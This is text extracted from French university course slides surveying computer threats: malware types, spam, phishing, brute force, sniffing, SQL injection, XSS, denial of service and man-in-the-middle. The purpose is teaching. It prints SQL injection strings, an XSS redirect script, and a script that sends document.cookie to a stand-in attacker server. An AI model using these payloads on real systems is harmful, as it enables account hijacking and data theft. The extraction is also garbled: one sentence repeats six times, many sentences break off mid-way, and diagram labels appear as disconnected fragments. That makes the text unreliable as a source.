Guide des Menaces Informatiques
Guide des Menaces Informatiques
1 INTRODUCTION
6 CRYPTOGRAPHIE
7 BIOMÉTRIE
Vol via des dispositifs physique : Il faut contrôler l’accès aux équipements
en mettant des dispositifs de surveillances et en tolérant l’utilisation des
unités amovibles que sur certains équipements.
Active
Basé sur le
comportement
de l'attaque
Passive
Type d'attaque
Interne
Basé sur la
position de
l'attaquant
Externe
Les logiciels malveillants peuvent être classés en fonction des trois mécanismes
suivants :
Charge utile : qui représente les effets ou les dégâts que le malveillant peut
causer au système.
© C. KHAMMASSI – 3BI-EB-BIS, FSJEGJ SÉCURITÉ INFORMATIQUE
20
MENACES ET ATTAQUES INFORMATIQUES
PROGRAMMES MALVEILLANTS
Les programme malveillants se déplacent entre les ordinateurs à cause de l’utilisateur :
Se déplace
Ordinateur Ordinateur
Programme
infecté
malveillant
À cause de
Ignorance
Curiosité
Utilisateur
Virus Informatique
Rootkit
Un virus informatique est un automate auto réplicatif à la base non malveillant, mais
Virus
Programme
Support amovible
Ordinateur
infecté
Support amovible
Partie « morte » du ver qui sera envoyée sur le système distant et l’infectera.
Les étapes qui permettent la reproduction d’un ver sont les suivantes :
Les étapes qui permettent la reproduction d’un ver sont les suivantes :
Les étapes qui permettent la reproduction d’un ver sont les suivantes :
Les étapes qui permettent la reproduction d’un ver sont les suivantes :
Les étapes qui permettent la reproduction d’un ver sont les suivantes :
Les étapes qui permettent la reproduction d’un ver sont les suivantes :
Un cheval de Troie (Trojan horse) est un malveillant qui est à première vue semble un
Le rôle du cheval de Troie est de faire installer un intrus malveillant sur l’ordinateur
Cheval de
Utilisateur Exécuter Troie Installer Ordinateur
l’intrus
Dans la plupart des cas, l’utilisateur est le premier responsable puisque c’est lui qui va
Télécharger
Cheval de
Utilisateur Troie Keygen Crack
Installer
Outil de
piratage
Rootkit Droits
administrateur
Ensemble de
logiciel
Un rootkit peut être transmis par les techniques virales en utilisant un virus ou un
cheval de Troie.
Une porte dérobée (Backdoor) est une fonctionnalité introduite par le développeur
d’un logiciel et inconnue par l’utilisateur légitime.
Elle permet de fournir un accès secret au logiciel dans la plupart des cas pour :
Porte dérobée
Développeur Désactiver le logiciel en cas de
désaccord avec le client (non-paiement
de licence).
Cependant, il est possible d’utiliser cette porte à des fins malicieux si la porte a été
mise en place par un pirate informatique tels que :
Il est utilisé pour enregistrer des informations sensibles pour les envoyer au pirate :
Mots de passe
Keylogger
Numéros de cartes de crédit
Pirate
Communications
Données
Ordinateur
Habitudes de
navigation
Il existe d’autres menaces informatiques qui peuvent être réalisées par la messagerie
électronique :
Pourriel (Spam)
Arnaque (Scam)
Hameçonnage (Phishing)
Pourriel (Spam)
Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
L’utilisateur introduit son
adresse mail dans les sites
web pour bénéficier d’un
service.
Base de
@ mail Site données
Programme
@ aléatoire d’envoi de
mail
Pourriel (Spam)
Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Les sites envoient un
message avec un lien de
confirmation pour s’assurer
que l’adresse est valide.
Base de
@ mail Site données
Programme
@ aléatoire d’envoi de
mail
Pourriel (Spam)
Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Les emails valides sont
stockés pour être vendus à
des sociétés de publicité.
Base de
@ mail Site données
Programme
@ aléatoire d’envoi de
mail
Pourriel (Spam)
Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Les sociétés de publicité
envoient les email
publicitaires en utilisant les
adresses valides récupérées.
Base de
@ mail Site données
Programme
@ aléatoire d’envoi de
mail
Pourriel (Spam)
Un pourriel (spam en anglais) est une message électronique non désirable envoyé en
masse à des fins commerciales (Publicité) ou tout simplement pour tenter d’arnaquer
les destinataires.
Il est possible de générer
aléatoirement des adresses
mail. Mais ce n’est pas une
bonne solution.
Base de
@ mail Site données
Programme
@ aléatoire d’envoi de
mail
Arnaque (Scam)
Exemple
banque ou encore vous annonce le gain d’une somme d’argent. A la fin, il vous
demande de payer une petite somme d’argent pour des frais de poste ou de
douane.
Hameçonnage (Phishing)
Mot de passe
Injection SQL
Injection de Script
Déni de service
Sonde
Homme du milieu
Une attaque par force brute est une tentative de trouver la clé utilisée pour décrypter
Logiciel Données
automatisé Clé
cryptées
Pirate
Mot de
Dictionnaire Service
passe
protégé
L'attaque par renifleur est une menace de sécurité réseau visant à capturer des
Logiciel
Pirate Paquet
renifleur Réseau non chiffré Fichier
Page Web
Paquet
chiffré
Mot de passe
C’est une technique de l’ingénierie sociale consistant à utiliser l'identité d'une autre
personne pour récupérer des informations sensibles, que l'on ne pourrait pas avoir
autrement.
Mot de passe
Identité
Email
utilisateur
N° de carte
Pirate
Identité
Paquet
réseau
Argent
L'attaque par injection SQL (SQLi) est effectuée en injectant des instructions SQL
néfastes dans le cadre d'une requête de base de données dans le but de contrôler une
Suppression
Vole d’ identités
SELECT uid FROM Users WHERE name = ‘Chaouki';--' AND password = '4e383a164dq48pa789e';
Commentaire
SELECT uid FROM Users WHERE name = ‘Chaouki‘ AND password = '' or 1 --';
Le Cross-Site Scripting (XSS) est une attaque basée sur l'injection de scripts
malveillants.
Le code malveillant est généralement écrit avec des langages de programmation côté
VBS
Exécution du
1 Envoi d’un Lien piégé code
4
Pirate
Envoi de données 5
Victime
2
Page demandée
contenant le code Ouvrir le lien
injecté dans l’URL
par le pirate 3
Site Web
ciblé
Le script malveillant peut être stocké dans la base de données du site web vulnérable.
Exécution du
code
5 4
Envoi de données
Pirate
Victime
1
2 Page demandée
Visite de la contenant le code
page piégée injecté par le
3 pirate
Injection du code
nocif dans un site
web
Site Web
ciblé
Destruction de la page
Ici le contenu de la page est remplacé par la phrase : « Vous êtes victime d’une attaque
XSS ! » clignotant en rouge.
Redirection
Cette redirection peut amener sur un site piégé, par exemple une copie du site
vulnérable. Cette attaque par Phishing permettrait de voler les identifiants d’un
utilisateur.
<script type="text/javascript">
document.location = "http://www.serveur-
distant.net/page-piege.php" ;
</script>
Vol de Cookies
En utilisant un autre script hébergé sur le serveur pirate, le script suivant permet au
pirate de générer le cookie dans son navigateur avant d’accéder au compte de la
victime.
<script type="text/javascript">
var addr = “http://www.serveur-distant.net/page-
piege.php?cookie=” + document.cookie ;
var imgTag = document.createElement("img") ;
imgTag.setAttribute("src",addr) ;
document.body.appendChild(imgTag) ;
</script>
Un déni de service (DoS) est une attaque qui inonde un service ou une ressource
Victime
Paquets
Serveur
inaccessible
Paquets
Pirate
de machines (bots ou zombies) pour effectuer une attaque DoS distribuée (DDos).
Victime 1
Victime 2
… Serveur
Pirate inaccessible
Victime n
La sonde (Probe) est un type d'attaque passive dans lequel un pirate collecte des
Applications installées
Réseau
Système d'exploitation
L'attaque de l'homme du milieu (man-in-the-middle attack) est une attaque qui a pour
but d'intercepter les communications entre deux parties, sans que ni l'une ni l'autre
Pirate